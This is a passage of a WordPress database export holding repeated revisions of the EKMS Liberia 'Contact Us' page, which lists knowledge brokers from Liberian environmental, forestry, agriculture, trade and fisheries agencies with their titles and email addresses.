<p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p><p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-03-23 10:30:57','2021-03-23 10:30:57','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3612,42,'2021-03-23 10:30:57','2021-03-23 10:30:57','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/konikay-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely BSc, MSc.</strong><br />EIA Manager<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll BSc, MSc.</strong><br />Technical Manager Conservation Department<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Joseph G. Duolupeh BSc, MPSM.</strong><br />Manager, Strategic Planning Unit<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Francis W. Mwah</strong><br />Agricultural Economist<br />MOA<br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>Jlopleh Dennis Wiagbe </strong><br />Director/M&amp;E<br />MOA<br /><a href=\"mailto:jdmne12@gmail.com\">jdmne12@gmail.com</a></p><p><strong>Halala Willie Kokulo </strong><br />Director/Crop Resources<br />MOA<br /><a href=\"mailto:kokulohalala@gmail.com\">kokulohalala@gmail.com</a></p><p><strong>Roosevelt Carlos Reeves </strong><br />Agricultural Mechanization Technologist<br />MOA<br /><a href=\"mailto:rcreeves@gmail.com\">rcreeves@gmail.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />Division of Knowledge Management &amp; Archive<br />MOCI<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\n</br>\nManager\n</br>\nDepartment of Marine Fisheries and Environment\n</br>\nNaFAA\n</br>\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Martin Killen </strong><br />IT Officer<br />NaFAA<br /><a href=\"mailto:maskillen@nafaa.gov.lr\">maskillen@nafaa.gov.lr</a></p><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p><p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-03-23 10:30:57','2021-03-23 10:30:57','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3613,42,'2021-03-23 10:34:49','2021-03-23 10:34:49','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/konikay-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely BSc, MSc.</strong><br />EIA Manager<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll BSc, MSc.</strong><br />Technical Manager Conservation Department<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Joseph G. Duolupeh BSc, MPSM.</strong><br />Manager, Strategic Planning Unit<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Francis W. Mwah</strong><br />Agricultural Economist<br />MOA<br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>Jlopleh Dennis Wiagbe </strong><br />Director/M&amp;E<br />MOA<br /><a href=\"mailto:jdmne12@gmail.com\">jdmne12@gmail.com</a></p><p><strong>Halala Willie Kokulo </strong><br />Director/Crop Resources<br />MOA<br /><a href=\"mailto:kokulohalala@gmail.com\">kokulohalala@gmail.com</a></p><p><strong>Roosevelt Carlos Reeves </strong><br />Agricultural Mechanization Technologist<br />MOA<br /><a href=\"mailto:rcreeves@gmail.com\">rcreeves@gmail.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />Division of Knowledge Management &amp; Archive<br />MOCI<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\n</br>\nManager\n</br>\nDepartment of Marine Fisheries and Environment\n</br>\nNaFAA\n</br>\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Martin Killen </strong><br />IT Officer<br />NaFAA<br /><a href=\"mailto:maskillen@nafaa.gov.lr\">maskillen@nafaa.gov.lr</a></p><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p><p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-03-23 10:34:49','2021-03-23 10:34:49','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3614,42,'2021-03-23 10:34:50','2021-03-23 10:34:50','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA 